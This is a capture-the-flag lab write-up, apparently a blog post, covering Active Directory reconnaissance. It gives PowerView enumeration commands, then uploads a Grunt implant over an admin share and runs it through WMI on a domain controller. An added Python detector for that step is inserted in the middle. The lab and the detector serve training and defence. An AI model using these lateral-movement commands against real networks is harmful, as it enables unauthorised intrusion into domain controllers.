BOFA CTF

🎯 Mission Briefing: Initial Reconnaissance

Mission Overview:

You've been assigned to gather intel on the ALETHKAR.LOCAL domain, where rumors suggest nefarious activities are underway. Your primary objective is to use the ALETHKAR\Dalinar account to perform domain enumeration, laying the groundwork for further infiltration.

📜 Task 1: PowerView Importation

Begin by importing the PowerView.ps1 script into your PowerShell session. This powerful reconnaissance tool will allow you to gather vital information about the domain.

Command:

PowerShellImport
Upload the PowerView.ps1 file when prompted.

🛠 Task 2: Domain Enumeration

With PowerView now loaded, use it to gather information about the computers and users in the ALETHKAR.LOCAL domain.

Commands:

powershell Get-DomainComputer -Properties name
powershell Get-DomainUser -Identity "Dalinar"

🚩 Flag Discovery: The Domain Admin

Your enumeration reveals that ALETHKAR\Dalinar is a member of the Domain Admins group, granting you elevated privileges. With this knowledge, your next step is to explore DC-1, the domain controller.

Upload and execute a Grunt implant on DC-1 using Windows Management Instrumentation (WMI).

Command:

Upload /filepath:"\\dc-1\C$\46eb39ca41.exe"
WMICommand dc-1 c:\46eb39ca41.exe
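
A defender's view of the upload-then-WMI step above, as an added example that is not part of the original post: it correlates a write of an .exe over an admin share (Security event 5145) with a process started by WmiPrvSE.exe from the same path (event 4688). The event records, their simplified `id`/`time`/`host`/`user` keys, the timestamps and the five-minute window are constructed assumptions; the host, account and file names are taken from the commands above.

```python
from datetime import datetime, timedelta

# Constructed sample events (not from the post), shaped like fields of Windows
# Security events 5145 (detailed file share) and 4688 (process creation).
EVENTS = [
    {"id": 5145, "time": "2024-01-01T10:00:05", "host": "DC-1", "user": "Dalinar",
     "ShareName": r"\\*\C$", "RelativeTargetName": "46eb39ca41.exe", "AccessMask": "0x2"},
    {"id": 5145, "time": "2024-01-01T10:00:07", "host": "DC-1", "user": "Dalinar",
     "ShareName": r"\\*\C$", "RelativeTargetName": r"Users\Dalinar\notes.txt", "AccessMask": "0x1"},
    {"id": 4688, "time": "2024-01-01T10:00:20", "host": "DC-1", "user": "Dalinar",
     "NewProcessName": r"C:\46eb39ca41.exe", "ParentProcessName": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    {"id": 4688, "time": "2024-01-01T10:03:00", "host": "DC-1", "user": "SYSTEM",
     "NewProcessName": r"C:\Windows\System32\svchost.exe", "ParentProcessName": r"C:\Windows\System32\services.exe"},
]

FILE_WRITE_DATA = 0x2          # WriteData/AddFile bit of the access mask
WINDOW = timedelta(minutes=5)  # assumed correlation window


def local_path(share, relative):
    r"""Map an admin-share write (\\*\C$ + relative name) to its local path, lowercased."""
    drive = share.rsplit("\\", 1)[-1]
    if len(drive) != 2 or not drive[0].isalpha() or drive[1] != "$":
        return None  # not a drive admin share such as C$
    return f"{drive[0]}:\\{relative}".lower()


def detect(events, window=WINDOW):
    """Return alerts where an .exe written over an admin share is then started by WmiPrvSE.exe."""
    writes, alerts = {}, []
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        if ev["id"] == 5145 and int(ev["AccessMask"], 16) & FILE_WRITE_DATA:
            path = local_path(ev["ShareName"], ev["RelativeTargetName"])
            if path and path.endswith(".exe"):
                writes[(ev["host"].lower(), path)] = (when, ev["user"])
        elif ev["id"] == 4688 and ev["ParentProcessName"].lower().endswith("\\wmiprvse.exe"):
            key = (ev["host"].lower(), ev["NewProcessName"].lower())
            if key in writes and when - writes[key][0] <= window:
                alerts.append({"host": ev["host"], "path": ev["NewProcessName"],
                               "written_by": writes[key][1],
                               "delay_s": int((when - writes[key][0]).total_seconds())})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

Both event types are only logged when the "Audit Detailed File Share" and "Audit Process Creation" audit subcategories are enabled on the host.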

πŸ” Task 3: Host Enumeration With your Grunt successfully deployed on DC-1, begin exploring the file system to uncover further intel.

Commands:

cd C:\Users
ls
cd Dalinar
ls
cd Desktop
ls
cat flag1-1.txt

🏁 Flag 1 Located

After navigating through Dalinar's directories, you discover flag1-1.txt. Reading its contents reveals your first flag:

Flag: a791523cdf17403d8c8890532efd4c55

Submit this flag to the scoring server to complete your mission and proceed to the next challenge.

Good work, agent! Your reconnaissance skills have paved the way for deeper infiltration.

This post is licensed under CC BY 4.0 by the author.